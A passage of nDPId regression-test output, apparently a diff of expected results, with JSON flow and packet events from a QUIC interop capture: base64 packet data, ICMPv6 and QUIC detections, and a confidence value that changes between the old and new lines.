LqIqgEVu+rqihenG\/3x1vbCDXllpynW3aJnILkUHNWbpfDPatq0AQGgN8Op2ovkZNf\/lP0t4iCiUxmNrrEYAIJpsoCwFTBFOv6YhOZgAb9RxW9d3SCROp5nmqJ9Q=="} 02149{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":96,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1603816434765,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":1603816434765,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUApalAAEAReTTAqAGAhfLO9L\/\/EVEE7ON5xgoKCgoIFbSGVwPjC1AAAETSB6nk7BQZ0n6OtRMgfqRMKv0mmF2ZCcJpOh5y0A\/toFlOz1fz5pBGD1YqR4r423K3bLjZPtU8zEdGrInkcNVS7Z9ZXa9KjSFkO6ZkCM+bgjrlPSYegWgr+lf8Seik\/OAa+9m4F+SKC3n3FYnChgcugjttcabtxcQG9UUmURCrO7eKZHimNrioYr36+LduCnNt9LNd\/zB6gPQej59n1H2PIibmagW\/fM66aVsVaR7zVHUCiH\/Qk70XwReQUNqQdtSK1o3x5foHfXLA3D5kXGSVsWki0olqZxxN4FQAu5\/vbJypl6cmZI9OG9mEaVsP3cQN5V6DcyMwwFq92zydNBh3eUgEPN9OuCoA1RCaRF2MY0ZRrUi4a0NGDiLUCV+G4SlLziz9xOJyHgGzjLPAE4BCeRh\/v6+wEZ8mgKyLD1EAVDV3zN30JJ6M0Me3hNHEEbe3VogRVZ0JV6CPYSKozfqmRIa1OO7TLbpqRx6m0yU\/HDbQvXQVvGPqTESIeDN9OWt+hRw0H3fhD\/0jWSUXeT5zzK0QccSYs9OMt6xct2EsrhYBO1aPATDoyaZAvzwTNWt8Eo\/XQktNf5jtBBlktbQBo67n4yyIo5rxgyPWJpQuRO297O7Mat4F1YWbTtTthkWIST5XlLQDR9sjWJQZoLrrVPuOGNaGgLiWbJpKZkPAmpkeoL2fbBEubmo\/7AK73pscjnUsQfmTU2Lhlzk7lE5KZzfdO6Ojycq4INOAlTRsxjE9Zej3obzZ+qt62gpD1eMqQQ4pmr3v0LhMGBrSM5EJ3Lmee9+dMb\/4XFUcIqSZvmCu1M+oA1IifmzxY0YneJ0hq33tjmK17Y6LsqmZvgvIsEtHUfp0429tqiTnJ7jEj9nv1Qws03vEaDx+VL91DFUBUZJsS2cGo6zH4U5+3ALd1d9yNs8qALm9NC2sFDyPeFu+wcrail+CekPau3rfVm\/\/BKg6uu98kDdJCbd1K4G6Sqm\/PNtzcVB3Yj4nmpQutpeBoYu\/N\/9zeylcHDDY+njAE8iIJji89hsMpr06VVSWYUsxYktuKVqxiBHUsyn1Qm+B+LGljetv1Jxr8cQu2ysaGbDgZRBSueKSbvXGNWhWLq7YBfLNgLfLQd6u0Si9aGjm8Is9C7byUaZ2JPKY6uJyDHXlNjc8po\/+0JxVFx+TI9y4r8FR94PIlv+t0snjZMMmWVUUkN9jPEM8reQ6rFbrOw2FyLxYpr7e6DBlYpr1rXi3y2AXbHOBjn\/yzFASJZWgEwjT9kc8\/kszRPabFnemr71tJxRnqsT7Z8rLpEDPHd34XFyRMJy5FhlpGRF5xBBWEPcYiNM4ACXS2zaqVvc4Ob6UONNiC5nq2MkrUel7u0fH3y+QFu5zcqtdETTA0rau+rX839r2M0xAous9B\/DzSAmhABN55MwenMuZXqKqO87\/SWuW3bCHCwmA4YTm0Y3MW31xmUfWCARViMQoMKL4e47lsZJmCw0S76EdXYT\/tkaU\/XJ34K+CTAC9yoTmJCAO9jIFpf2oBzdts69jtTj6Cw9qgKbQnkEP\/wuWHtVAcedrnVjSQu7O6Hr86jboN5XBirNkD\/k3Zb0R5f1hF1X5cR6OxDuouIjIFrBbnyzMLcWJq+pJzxbnTW8A+JnK8lKA7Q=="} 00609{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":97,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434766,"flow_last_seen":1603816434766,"flow_idle_time":140000,"flow_min_l4_payload_len":1240,"flow_max_l4_payload_len":1240,"flow_tot_l4_payload_len":1240,"flow_avg_l4_payload_len":1240,"midstream":0,"thread_ts_msec":1603816434766,"l3_proto":"ip6","src_ip":"2400:8902::f03c:91ff:fe69:a454","dst_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3} 02159{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":97,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":67,"flow_packet_id":1,"flow_last_seen":1603816434766,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"thread_ts_msec":1603816434766,"pkt":"PKn0qB\/spJGxgjQ5ht1gCcrWBNg6NCQAiQIAAAAA8DyR\/\/5ppFQgAQsHCsnVrqTT\/kdpHoB9AQTxKAAAAABgCq04BNgRNSABCwcKydWupNP+R2kegH0kAIkCAAAAAPA8kf\/+aaRUlL0BuwTYjlPGCgoKCgjBjvWe+MPFRAAARL4AnyCwAgoQjL1g+KDURvDYeEyLw\/xCRk6Dll3vQteHoVQFBQKAtW3\/PUJKxA75UMcNXhZUvkOXlYopsWey\/u66wX35Pj6pU3CXAqQ3fDp5zyCvr8Pm5AyoNAx0veCSUQeDBYfIgnerrrO2MEGoBqYPiiUt8xe5+r79P3P4ZzDRVupqGycbUWtQ6Wo6aZSD05slEqoyPBAaLp3YhydnPgb7vRWFjq0SdM0H\/zxBdY7aJ5VQRGeFUx984uZ\/K6yeMGPT3JYsoR6JIONmbNNldMQuEP+a7GBJ3iEWFJ1Nkel3g0iBwZRA7TTHinpesR5BAPJGKsJg\/VS2BeEVhnsQklM+ccg8cEJ\/WZ8KGZKu2b5eb3vaAvV55IOI0J2iO5UmLyQCl7SbwQC4xeRqoU1X\/r4ksMW+JxOVqFoTOp0p9K8G2C+kXU7PkGNUF6LWJgz0gBnPUfLEiLYep+IB3ydQMSXFv2q4ljMWpImZsfM1M1hyBHVdutiac3ctGpn70sK96\/GuFpnGs5SaPUZPVAd6cowQNyios9VD7LJHBycvPPV\/FVVqGKmtlmE1jhqYU8WM3TP2hIDFKj\/VkbTWINB6wKhdoTjaE++G5UWOW3DyJNvkrdNQDmb57TWpCvvDwZ0zyc9+kjM1P8gJU7fxklAOWt77tLOKjqKz2yyGTywbYI8fpyDxuwcOqHHM1p9Qo2bUMzUDDc5AgR5XXK8f98\/2k\/szEHoOj+xZ0LAk\/ktl3\/tNcCYf5NwDCkoJ2SA+A3liVp\/z86DQ\/o9ZPBbnT\/MRpriiusVj\/+7dyNzTUlosBxg\/ZTGIAFG9kkbqpmlXa9h8whQ+M5AjGTQXahgxhUg+T+XkcD3\/AwAskzg7QFF8QOQvTkgKR27pnPB9TcW0ov3zRKBSq2IRQasfzD4018QjLIoL6M1i7zKWOriPXhrbpQCBMed+qy0CCutCqcHfM5C6tdP5yjdd03xLltagPaoEJdMAzkTI4GTxawZxV\/nJEB2CpfHpXBAiLmSF3pSqQkOlK3gecF6Z5kJRZxdfHFiYQc+ZeBxM3ZsG9j3S6poeVhWhKtKijv579ezhO7g3QE97akiUNAtC\/9u96VNcgwwZo3pYzoh+bmR12ZZk\/flZDnZgzTtqeO5zikP6EaDg3xt4ZqzYpvmcwxx5bFkZ6tYCa\/WSn2OsS\/V89R9JkA+p04smS\/E7zSLxIHIjg7ziPRYLmF24dGHz34FZmheQHZ\/4gm1aFmIaG6\/7f5wmQDqHrB8QpqkJoLkDgUUHwTgyqeLrCOeAdu2eQCQJ4129kNDhXnJ7gWkCKO71EQxgH1wOzb5+V8dr\/jGNAAVFaptYOiLQes+Et0OXv\/4vGauirP+hYZEEAR3InBIIg\/L5KPxSdMCpSCm\/3UnE1zUNlTk7El74hPsNYUcmUS+usyw22jx+xLs4q3Kod9YDt4DrToci+qgaxSPs+xB3bX18DBMDyb8wNM5xFrlJXeWv7YCCDubwS+dnWseGEwnfJTp8dJgKhqy8jDuI7wNl1iTi5TWAuubz7G08V4L8udRmpqYJpILlag=="} -00670{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":97,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434766,"flow_last_seen":1603816434766,"flow_idle_time":140000,"flow_min_l4_payload_len":1240,"flow_max_l4_payload_len":1240,"flow_tot_l4_payload_len":1240,"flow_avg_l4_payload_len":1240,"midstream":0,"thread_ts_msec":1603816434766,"l3_proto":"ip6","src_ip":"2400:8902::f03c:91ff:fe69:a454","dst_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","l4_proto":"icmp6","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} +00670{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":97,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434766,"flow_last_seen":1603816434766,"flow_idle_time":140000,"flow_min_l4_payload_len":1240,"flow_max_l4_payload_len":1240,"flow_tot_l4_payload_len":1240,"flow_avg_l4_payload_len":1240,"midstream":0,"thread_ts_msec":1603816434766,"l3_proto":"ip6","src_ip":"2400:8902::f03c:91ff:fe69:a454","dst_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","l4_proto":"icmp6","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} 01194{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":98,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":1603816434766,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":590,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":590,"pkt_l4_len":556,"thread_ts_msec":1603816434766,"pkt":"PKn0qB\/spJGxgjQ5CABFAAJAgWgAADQBpMeDnxjGwKgBgAMD5agAAAAARQAFAG8bQAA0EXREwKgBgIOfGMa+BBFSBOwcysIKCgoKCAcy61WfYmyeAABE0qUiGIQ4aIhBbz9agQnzKFP+Ko6UG2\/VO43Zha3PL4kqY0AO3g0iECAhk\/6ZwBC4N756XgQuYU60gIOctL9zb4\/OWAg0WA1DbWYP4KnPZTIp669qsv\/rQAibIfU1C4jJIVVwUvw56ggX1ZWtsSkpVhlWA38X41jyzp4YyuLbkb3bAYN\/EIWaL4EMGxO+IKXjPgtJdchWUK\/9x2bQrLTQrTrt1LVvOFtezyOxX3HU59rOyjLCliLHhymipAdeA2iilJa\/G\/jNCnm92iYqQ99y1tLbXGL1SO3nVuTvR5sjExBx5iwaDhDbYKtasZmgPHXFcFC5nc+7+wPPW5yfWD1laEE\/wGN7z2vQj3O2l8846UB817y5kdQqfJcn3ryUAQboDsw9RBRvujkaoMcMv7dwDFaulIkwKjh5NdGImH6DlqdJnNJe\/djBGIoTx+FNEOCf8VgkH2AS3NkcDuSUvP6wRjfzpEDMKt1+bfZxTozz2QUXP\/r1d5e\/ChVkzBO9tgTIIsrdTwdCDHK\/8GPaAe9Z9\/eOLqg1E0MYdvN2a123wOsPL+4jXgdZ77SJH2U6Of\/XWPTaYlfaheABwpiMv6I00YAPVCHV\/IRMeTtBZrb8p0Ppi3qMyAgRXlwJ6aGPFOXZdGvMJWgaWpFkLrTD65P5wK4ostYxbEc="} 00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":99,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434772,"flow_last_seen":1603816434772,"flow_idle_time":140000,"flow_min_l4_payload_len":1240,"flow_max_l4_payload_len":1240,"flow_tot_l4_payload_len":1240,"flow_avg_l4_payload_len":1240,"midstream":0,"thread_ts_msec":1603816434772,"l3_proto":"ip6","src_ip":"2001:19f0:4:34::1","dst_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3} 02142{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":99,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":68,"flow_packet_id":1,"flow_last_seen":1603816434772,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"thread_ts_msec":1603816434772,"pkt":"PKn0qB\/spJGxgjQ5ht1gDK7JBNg6MyABGfAABAA0AAAAAAAAAAEgAQsHCsnVrqTT\/kdpHoB9AQS44gAAAABgDEm8BNgRMiABCwcKydWupNP+R2kegH0gARnwAAQANAAAAAAAAAABrNMRUgTYSrXMCgoKCgj2S26kHUj2aQAARL4Oqb7kxp8VwqfBhPdfdtQhtwUXSB8\/M16zqaKTaiM4uFSCgiApTua+W3aFO11E8\/vpjw5fdiBSABUTDotMg5RkiQr0MSpUaARnrP0PNMBaoZi0T3torsgUpfH8Z7GKLvwTGd3hbCPXQz5HEzUHjJnObkXYOU8pDBMRAGZYnp5rkZbRT2vPBVCj8Cvx8bBBKneUgl1FG4uQ4EwyOma55O1RYgmn2Ynf1Ko5xhvyQTnOGQ+R1VyW0n7heo02IMCfY4VWPj\/QJHyKTPMBIDBtSvz3J6mf3nv69QC6K+3y7kTFVD4RNSmXPDKfJ4r8a\/jVYQ3tiwvsysKnCLgA5zby1+dfPHEiaiwawfH+cKDMssE48zXk1+MDRnahgP5\/5W7h5R0W7WQX3skNYTREacQ3LvDACn58ERfFzl2AshIb29QMiGQj+aXYqT7ftIu1mYCEtR10HqM0E0tdjMJlVoxU1sQCMNHCcSjur932nDLMq95bmJ\/epzRqKtYXqFfJm4ZnhGTZV2QZB+hX7pNkAbrVOicdWh6ASPsIKRVzbgM4azW3TFLOWbFSWksd82BdcgW3kBeZ+Zy87igudzpPx0kdISA+wUJUrSUaJmejNXcUK68sicz01uq+5FBxl7uzJB5i2OXGU+jvmL+lkKweCPtvayVLhcuvz7KLW1nrXu3HU\/E\/bgsaTJyGVokl31OFOSR9LQtdKuoewFPyn5r490C8zNMeXqpImt2kn4Tr\/jlH\/fxzyim4MX4msP404e3jLfo+J9lzJhkenDu9xAnUgd\/iKSb6RgtGPU4Y6NI2QNpIfd6MzugcP8a0lodftPQcResoW35Hgg5t6I+PqN5frd2jtB5RiFyFN6yYVSH5fwqpb5sgLyM2ZMvumoV6ZVCMO3EMaRJu6f+U3CDduLYbXqPjXTUFXnzx9Vt03+YreNFX6wa5PrrBlSKMZP\/2WAmhb8cWINvyoZmFlnI2qd6sXg1dpFNY99Vqu1GrXPgV8Qi9MxV9uHzluuqG5swDMVT91S3LeU6XPmicYuwxrVZ0fDoeWpn4Kta0sEVDVUOf9hI8REFrn\/lLtMViNZ5rtWhIMKLyMIne37ob1RynB8J3PHqTTUqyQWLUmsA7XpXuycyFg0eDsVEBgiX65miUosWBtlhptbWoDODs0zqjlEGqOg5rKyio59+SI+p7jTV93mdfy9Wt2QGrnsPSiOSsj\/pqM\/pZ2PPrcgdTK9VPceK3CdsRz\/jNTpieviefPJXgnQD9JDKvgbRzI7jy8hldn4q+BSAvi3W0FwGFIYHJsgwTS2D+M4jyoohPca8fHwPwrKPUAytl3yLskOFTcOEOwWAP0YkHc8DSZIYnWDfZRitncpUl9qEcnjpTihvHHfw2HQxFR5lkMlUwBOL06kpNLUObIMz0gJ8az8O5U2MJseOwsScI7UtAgMA1Wat1Jr7S5b3fSl1DVUzvG0hnyrSZS2C54u89rSG8QQybBKCeSDnq1GpKeq\/O7HdjP04WmFuLDA\/vf\/9lSaOXhNpEErLndSFsHzNaPYP8EGwGI4iaWZOfcrm8Fw=="} -00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":99,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434772,"flow_last_seen":1603816434772,"flow_idle_time":140000,"flow_min_l4_payload_len":1240,"flow_max_l4_payload_len":1240,"flow_tot_l4_payload_len":1240,"flow_avg_l4_payload_len":1240,"midstream":0,"thread_ts_msec":1603816434772,"l3_proto":"ip6","src_ip":"2001:19f0:4:34::1","dst_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","l4_proto":"icmp6","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} +00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":99,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434772,"flow_last_seen":1603816434772,"flow_idle_time":140000,"flow_min_l4_payload_len":1240,"flow_max_l4_payload_len":1240,"flow_tot_l4_payload_len":1240,"flow_avg_l4_payload_len":1240,"midstream":0,"thread_ts_msec":1603816434772,"l3_proto":"ip6","src_ip":"2001:19f0:4:34::1","dst_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","l4_proto":"icmp6","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} 00600{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":100,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434776,"flow_last_seen":1603816434776,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434776,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"51.158.105.98","src_port":43735,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02146{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":100,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":69,"flow_packet_id":1,"flow_last_seen":1603816434776,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":1603816434776,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUAYA1AAEARdrfAqAGAM55pYqrXEVIE7DzAzAoKCgoI2nqja59HDyMAAETSIwUh\/jjSyce1pBuktMAn\/9fQVpvzsj8X4f6zzIa5zUMyPshEJVxx\/HgJpy2DounAtWqOn7MykfNk1iAT6IFLl5JJDlHVUgHekilaBHXQFm7iNuBD05oF1B0F7q8Qrx84dCVbjPq2TzzI4E8Jn0w6eGKEzj3zAOYyN\/jtcSwUMH\/tdAvJ2KZeRWAZwgBZ+NHFpdpJskxMoq8BiazR6NmdCcDVWJJafWv\/J6n2MwHgdrbXoHD7z9vBv7OTw1ZsmRTWOginovLBtLwEow12QHwK+3EKlGb67Dikjj6Hsiva+EHGjyXXT3NafDD2Mdy+tEkICJVPMdfQgSiLKciRXmF+eiaKhn6t+ZZDXwMIx1tObSDzE+o6+VwUniuIqDp4P1P\/ToVtD+B8x7Pd8fdBpJ4GLav9M4cI3Wrt3ZFYV3\/N8JUWUnnIryRD+gsn8U6xZxSihwbPDnANbZkkqUwtRBWNdvrID63JeJlKECXOhipg3RPgW+AtU7DD8FGCQwK077KHK\/4iE0FRnsfBWs4NiPYWSuDiKbOCzUPifBciRr8tMI1kDMDYdqhOf\/t2cQwVRdaNiCXpVyvtWa68KE7YuTZbjpI5Zm9LOCld3hJ01MiZ7LFRGruZgu66Qt6cNK570mj580eh0jpjgWEGkDr8jkE8qlxmZ\/+JhXsVQeSLOCJpxCPnoKcC\/AgENxJJFj5QqhvZ4\/+S85TLqOVPU75k58aRkk+ToNWPiawuoh+7ZmQNuVNQVgcCtQEXQJu346G7rcjTAKMH3PDGS8OBxREkqOUKIE\/fJzE5mkwFxduFK\/B7NuaeUP\/viNgVQPK+xx+1Ngb7A4VcDPdAPTWKWgbWpoEudTGTXV58El7GU8KydW+XNFItpFzmhNuEFbckU8GM1h8hyV6YxNQ+Ywvmqeqx+Qpa2gsPfebPvZhoavla3sgCdU8L3Fi\/gojIsV72icFiRHpi7wgSeg+dYFEA+ApHg9oKhJJhp8\/wWsOTm76uoFhEbKbRL2YPAgB\/Ql+puWC+1\/d1JEz2eZaAp5Zo4yW5zTvhxVsa5hrrLnPK2t90EkaeWT3kM4NBLrAUyq7fPgZ5preHWxkcCRzxymqgt+6Xj2oWVLVyaqWrzsHWrurGOxbP60QM5pMHY613Q+LrLNvTCsh4ZQzv0k2FKQRVr9u07bMlGLVO5kHK8AlGOnI97GL1hRF\/kBPlbHravjlbftLM0ZE+ofUKm3FCAyqpSNR5f+azjzb6QBklYN+zHv4anLf2bRojetf7WIpCzUtOun8gE3beg5nRdzOcNC5G1ZAhS4QZYrCUyLzy6dQnaI5ti\/HjmSldcvKZM0X8HEANm0ee5l4G\/rQp3samcnQbFsOFm5GfplnfCVyDu6SZLaWZt28o+RfSwBU5HTnFtZyilWnthqnChfP+hUfiDQ1asKcjklc33MY5RFlJ6ek8gI0+BRbnKE7zMoxaJ8oo9BJU12dwyF3tndCM1wJjl2MBm5rkAUb1j4xIIVUrcA0Os8Qp7MwNsapkh+lLuE3uc7vgFLS327NgSo9rR6EA2jIx++BL4omb8CcMSEd5E0h8ER2PPQ2Ijvdcaa4AGZMCHiMkSxGpTa9jY4devoI6nqBsHtnxRjt+CQUUD3xf\/+arnnuqKk3gOjeyEQ=="} -00999{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":100,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434776,"flow_last_seen":1603816434776,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434776,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"51.158.105.98","src_port":43735,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quic.seemann.io","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} +00999{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":100,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434776,"flow_last_seen":1603816434776,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434776,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"51.158.105.98","src_port":43735,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quic.seemann.io","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 00544{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":101,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":53,"flow_packet_id":2,"flow_last_seen":1603816434779,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":109,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":109,"pkt_l4_len":55,"thread_ts_msec":1603816434779,"pkt":"PKn0qB\/spJGxgjQ5ht1gC0dvADcRMSYEqIAIAAChAAAAABJ5MAEgAQsHCsnVrqTT\/kdpHoB9EVLSAAA3EH3TAAAAAAAI6BdjXmXwmldRMDQzUTA0NlEwNTD\/AAAb\/wAAHP8AAB3\/AAAe\/wAAHw=="} 02153{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":102,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1603816434779,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":1603816434779,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUA7X9AAEAR3vnAqAGAyu7cXJgVAbsE7F0\/xwoKCgoISaS\/HP4FIE0AAETSs+MVmuG4wpmNcPXwiwbgkyhiThvn0LHBRqHfn+gXOdfthzxlp0ltI03pZKw9vyqEYoBiUoMOALn8iwjEM1bBG0sKOHNmuafb9yKJq5CpXdfVW9fnnip2p1tWnGQZccSpOc1uq0bHiGjb10mg3cqpILSGktAMKwPjSF47KMJxZp\/l9ao1+O97nqhSrQZgHoEMImlI7ZCND\/wyqspL+eu6NAWz3rU9vba3BnFw354DNfuXu8HOGbC3Guvt9ytqxi0Yz5DSI1kvCcdc1n7wT0BoaLVFB\/yV1s2y5v5nH3DzJd2ACj9o\/zmaZyMpvWCTRg29elBjIR6fiI98dZm7sRE0VcNIEEqTNqSeoXcWt5unTNHBRYj7lwzoPoXK2TUjG515g9q9fHLJbLWr6\/hB+vEJG6S7dsFN6dIXdTpgqWHu81xJ1m9hfY7AkYBIllm4leEOWu1SRr5c\/AEsknAD+6XbQas8XXqJRRnDaBD1csMJtZvxoVWNSuOHBfOUyiZ4hDYxHjMLTLGygYFsDHCP93SCma0J1PrsKV4mBTWbhdzxAD3aoMxgjoxla8DQxuClSD4NOC96GJ+rdubJmMLxnEpF5JDa1IKuYrUXV3w\/4wQZqtP7g6zDf2GhddDBCDNr7yc+hg+5ilxcgcb2MVoLkgX1OkizCx2RSfRb0eK8thsruCLFSby4jO8bsuNj\/DwRHrD9ALa9P\/tMKNqD\/QB3PCX6uMJrfyT324LeetrVxPvOBvrQpiJegaN9JcarJLQiUBPGBrK+q6yGhmqia+H4CTzm98FspAgFJ3pIDJit2uCN0awhg2fUthbI0kXrjD+YpQbOi0QPuM2dRjqPXjXqrT+X2FbVUvVA37Xe2HlgHJQb01jyc3xry22J8\/uMKksqV4OfH9xACygHSWKGL7403rhhUIh\/1OKDuete+v6YGMI6HZHwxepcu1MBc8\/3NDyIJT7pGaR74MXwks5nUPSMbWXdz5gpe86RgRisPos\/HQNeweIwtPmU7vDULxHYQYbZJm932INOf+U0JuYM9\/0yyF82eovZ0gS\/AOY09vwKYKSps2BcZpcxKZJ6olMmG8Bd8RL\/TLXZh8OzsalyvubiZwDWuVVt1AZfvz8bSBiibxOi0oZJkb4Skel7UVJq4ZUt\/AwshUTtNvBmdhQCuqFbi+vqgJQibSCoN9R4ZSyuDwh4LgKfjp+jo8uQyFbtI8t7MPDA2gEjE9qSW351YU9i5A\/s6I\/H0QY4qaYHU6kmhNbmIKATtEXjZl9SsVnMQ++X3XZU09ZdvRROedhNjBpUePUF2+I+GgpQe9uXNKuTX5eintxBFe\/K9\/CrJuH447MCSJbL3kP6Bf4Qg2eo6fEs5dY6Gxdja3GF51OjnRG43ifui\/tVzaMUi324TS\/XRgkk6p17f60JC6V4Gg40mbPu0O21JxeTFWtWMYV6jinEN5pHS5s61dr9fU3vtxIOEN\/xMZjMROyRyCA55e\/0gx+GVjszIFs+UXq\/SyGgMEveU6gGW5EAZ3dCbJv6R+xa9kprk+rkDzgIuFc+I5Eg81JJd+kRHZiTfuhJaM8VwpyTDR71\/6\/lU7nCHcQiW3bXtU47eJyWza+vS4JMmYpHRxlNVbyyHp66eitmqcsnzcAlPI7xtrqCvg=="} 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":103,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1603816434782,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":1603816434782,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA\/AABAABwRNNQSvVT1wKgBgAG7iFcAK9mxgAAAAAAACPLo65bqtzD4+s6wDvrOsAH6zrAC\/wAAHf8AABs="} 